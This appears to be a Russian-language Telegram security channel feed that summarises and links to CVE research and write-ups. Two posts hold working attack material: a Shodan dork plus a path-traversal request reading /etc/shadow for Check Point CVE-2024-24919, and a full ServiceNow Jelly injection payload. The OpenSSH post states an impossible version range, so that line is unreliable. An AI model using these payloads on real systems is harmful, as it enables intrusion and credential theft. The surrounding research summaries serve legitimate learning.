🤯 Анализ новой уязвимости Linux в nf_tables (CVE-2024-1086)
🤷♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.
Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.
Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.
👉 Читать
#research #linux #CVE
🤷♂️ Ничего такого, просто ядра Linux (5.14–6.7) подвержены уязвимости Local Privilege Escalation. А это самые распространенных ОС Debian и Ubuntu.
Автор написал своего рода исследование, в котором поделился первопричинами уязвимости и универсальным PoC'ом.
Материал отлично подойдет для новичков, которые хотят научиться искать баги в ядре Linux, потому что сложные темы разбиты на разделы (к которым можно вернуться, если совсем непонятно) и написаны простым языком.
#research #linux #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1🥱1
Все пишут про CVE-2024-24919, и мы напишем.
🔍 Дорк для Shodan:
Эксплуатация👇
#CVE
title:"Check Point" ssl:"target"
Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🤯 Хотите хардкора? Читайте разбор уязвимости CVE-2022-24834 в контейнере Redis, работающем на Alpine Linux
Уязвимость затрагивает модуль Lua cjson в серверах Redis <= 7.0.11 и представляет собой переполнение целого числа, которое приводит к большому копированию данных (~350 Мб).
👉 Читать
#CVE #writeup
Уязвимость затрагивает модуль Lua cjson в серверах Redis <= 7.0.11 и представляет собой переполнение целого числа, которое приводит к большому копированию данных (~350 Мб).
👉 Читать
#CVE #writeup
🔥5❤🔥1
🌐 Введение в эксплуатацию Chrome
Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.
1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
• The Parser
• The Interpreter - Ignition
• The JIT Compiler - TurboFan
• The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References
👉 Читать
#research
Где одни из самых крупных выплат? Конечно, в браузерах. Читайте подробнее полезные заметки, которые уже переросли в глубокое исследование.
1. Introduction
2. The Chromium Security Architecture
3. The V8 Pipeline
• The Parser
• The Interpreter - Ignition
• The JIT Compiler - TurboFan
• The Maglev Compiler
4. Setting up the V8 Debugging Environment
5. CVE-2023-4069 RCA and Walkthrough
6. JIT-Spraying Shellcode
7. Addendum: Version Independent Shellcode
8. Conclusions
9. External References
👉 Читать
#research
👍2❤1🔥1
🤯⚡️ regreSSHion: удаленная уязвимость pre-auth RCE в OpenSSH сервере
Что еще может перевернуть обычный день в ИБ-сообществе, как не критическая уязвимость в популярном сервисе?
Уязвимость получила идентификатор CVE-2024-6387 и затрагивает OpenSSH (с версии >= 8.5 и < 4.4). Она позволяет удалённо выполнить код с правами root в Linux-системах на базе glibc.
👉 Читать исследование
#research #CVE
Что еще может перевернуть обычный день в ИБ-сообществе, как не критическая уязвимость в популярном сервисе?
Уязвимость получила идентификатор CVE-2024-6387 и затрагивает OpenSSH (с версии >= 8.5 и < 4.4). Она позволяет удалённо выполнить код с правами root в Linux-системах на базе glibc.
👉 Читать исследование
#research #CVE
🔥6
💰 Magento XXE в деталях (CVE-2024-34102)
Команда Assetnode провела очередную блестящую работу, воспроизведя недавнюю pre-authentication XML entity injection в Magento. Автор уязвимости — Сергей Темников. Его исследование можно прочитать здесь, но оно не содержит пруфов.
👉 Читать
#writeup #CVE
Команда Assetnode провела очередную блестящую работу, воспроизведя недавнюю pre-authentication XML entity injection в Magento. Автор уязвимости — Сергей Темников. Его исследование можно прочитать здесь, но оно не содержит пруфов.
👉 Читать
#writeup #CVE
👍2
🤯 Объединение трех багов для доступа ко всем данным ServiceNow
В ходе пентеста команда Assetnote обнаружила три критические проблемы в ServiceNow, которые позволяли выполнять произвольный код без аутентификации и получать доступ к данным для инстансов ServiceNow. Читайте подробнее райтап и ход мыслей исследователя👇
Итоговый пэйлоад:
⛓️💥 Читать
#writeup #pentest #CVE
В ходе пентеста команда Assetnote обнаружила три критические проблемы в ServiceNow, которые позволяли выполнять произвольный код без аутентификации и получать доступ к данным для инстансов ServiceNow. Читайте подробнее райтап и ход мыслей исследователя👇
Итоговый пэйлоад:
http://host/login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*7);</g:evaluate></j:jelly></style>
⛓️💥 Читать
#writeup #pentest #CVE
👍2🥱2
Вы же знаете про Ghostscript? Это инструмент, который используется для предварительного просмотра и печати документов в формате PostScript/PDF. Естественно, его под капотом используют в веб-приложениях для рендеринга PDF-документов. Вы даже можете не знать, что веб-приложение его использует 🤔
Команда Codean Labs опубликовала уже второе исследование по теме — читайте, учитесь и вдохновляйтесь:
1️⃣ CVE-2024-29510 — Exploiting Ghostscript using format strings
2️⃣ CVE-2024-29511 — Abusing Ghostscript’s OCR device
#CVE #writeup
Команда Codean Labs опубликовала уже второе исследование по теме — читайте, учитесь и вдохновляйтесь:
#CVE #writeup
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
theori.io
Deep Dive into RCU Race Condition: Analysis of TCP-AO UAF (CVE-2024–27394) - Theori BLOG
CVE-2024-27394 is a TCP-AO Use-After-Free vulnerability caused by improper RCU API usage. Read the in-depth analysis and reliable triggering technique. | Vulnerability Research
👍4
Разработчики GitLab выпустили патчи для устранения нескольких уязвимостей, наиболее серьезная из которых (CVE-2024-6678) при определенных условиях позволяет злоумышленнику запускать пайплайны от имени любого пользователя.
Пайплайны GitLab являются частью системы CI/CD, которая позволяет пользователям автоматически запускать процессы и задачи параллельно или последовательно для сборки, тестирования или деплоя изменений в коде.
За последние месяцы GitLab уже не первый раз устраняет связанные с пайплайнами баги. Так, в июле 2024 года была устранена критическая проблема CVE-2024-6385, а в июне — CVE-2024-5655.
👉 Подробнее
#CVE #security
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤2
🥷 Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409)
Зачем изучать различные CVE? Хотя бы за тем, чтобы расширить кругозор в нашем сложном ремесле и понимать предпосылки возникновения багов. Сегодня для вас очередная критическая уязвимость в GitLab, позволяющая обойти механизмы аутентификации SAML и получить несанкционированный доступ, используя недостаток в обработке ответов SAML.
👉 Читать
#CVE #writeup
Зачем изучать различные CVE? Хотя бы за тем, чтобы расширить кругозор в нашем сложном ремесле и понимать предпосылки возникновения багов. Сегодня для вас очередная критическая уязвимость в GitLab, позволяющая обойти механизмы аутентификации SAML и получить несанкционированный доступ, используя недостаток в обработке ответов SAML.
👉 Читать
#CVE #writeup
🔥4👍1
🔥 Fortinet FortiGate CVE-2024-23113: суперсложная уязвимость в суперзащищенном устройстве в 2024 году
Исследователи из лаборатории Watchtowr обнаружили очередную уязвимость в SSL VPN.
👉 Читать райтап
#writeup #CVE
Исследователи из лаборатории Watchtowr обнаружили очередную уязвимость в SSL VPN.
👉 Читать райтап
#writeup #CVE
🔎 Охота за (не)аутентифицированным удалённым доступом в роутерах Asus
Два исследователя безопасности изучили недавно обнародованные CVE, затрагивающие маршрутизаторы Asus, и проверили, при каких условиях возможность «неаутентифицированного удалённого доступа» может быть недоступной.
Самое интересное здесь — инструменты и подход, которые использовались при анализе прошивок. Обязательно прочитайте, если любите реверс и хотите чего-то экзотического.
👉 Читать перевод
#reverse #CVE
Два исследователя безопасности изучили недавно обнародованные CVE, затрагивающие маршрутизаторы Asus, и проверили, при каких условиях возможность «неаутентифицированного удалённого доступа» может быть недоступной.
Самое интересное здесь — инструменты и подход, которые использовались при анализе прошивок. Обязательно прочитайте, если любите реверс и хотите чего-то экзотического.
👉 Читать перевод
#reverse #CVE
👍4
Ivanti действительно необходимо привлечь серьезных безопасников для настройки пайплайна фаззинга своих продуктов, поскольку такие типы уязвимостей неприемлемы для вендора продуктов secure edge с доходом более миллиарда 💰.
Новая уязвимость вызвана переполнением буфера в обработке блока
clientCapabilities
бинаря /home/bin/web
. Проблема связана с неверным использованием функции strncpy
, где размер исходного буфера используется вместо размера буфера назначения.Уязвимость позволяет записывать данные за пределы буфера, что может привести к перезаписи адреса возврата и выполнению произвольного кода.
#CVE #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3